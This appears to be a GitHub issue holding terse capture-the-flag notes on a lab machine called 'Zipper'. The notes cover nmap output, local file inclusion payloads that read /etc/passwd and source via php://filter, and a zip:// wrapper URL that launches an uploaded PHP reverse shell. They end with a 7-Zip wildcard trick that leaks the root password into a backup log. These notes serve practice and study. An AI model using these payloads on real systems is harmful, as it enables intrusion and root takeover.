Open WDavid404 opened 3 months ago
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Zipper
80/tcp --> click the link of "Home(current)", go to http://192.168.196.229/index.php?**file=home** --> it may have LFI vulnebility.
Try
../../../../../../etcpasswd
php://filter/convert.base64-encode/resource=../../../../../../../../etc/passwd
..
--> didn't work
finally,
php://filter/convert.base64-encode/resource=index
-->
Try php://filter/convert.base64-encode/resource=upload
(because we found /upload page)
https://rioasmara.com/2021/07/25/php-zip-wrapper-for-rce/
-->
192.168.196.229/index.php?file=zip://uploads/upload_1722343257.zip%23php_reverse_me1
(Note:
linpeas:
#!/bin/bash
password=`cat /root/secret`
cd /var/www/html/uploads
rm *.tmp
7za a /opt/backups/backup.zip -p$password -tzip *.zip > /opt/backups/backup.log
cat /opt/backups/backup.log --->
7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,1 CPU AMD EPYC 7413 24-Core Processor (A00F11),ASM,AES-NI)
Open archive: /opt/backups/backup.zip
--
Path = /opt/backups/backup.zip
Type = zip
Physical Size = 818
Scanning the drive:
3 files, 394 bytes (1 KiB)
Updating archive: /opt/backups/backup.zip
Items to compress: 3
Files read from disk: 3
Archive size: 818 bytes (1 KiB)
Scan WARNINGS for files and folders:
WildCardsGoingWild : No more files
----------------
Scan WARNINGS: 1
According to https://book.hacktricks.xyz/linux-hardening/privilege-escalation/wildcards-spare-tricks
and execute cat /opt/backups/backup.log
again --> No change...
And we can fing that there were @enox.zip
and enox.zip -> /root/secret
is doing the thing we just do.
so, "WildCardsGoingWild" in backup.log file is actually the secret of root
Try su root and use WildCardsGoingWild as password --> works!!
Keypoints:
php://filter/convert.base64-encode/resource=<page, e.g. index, upload>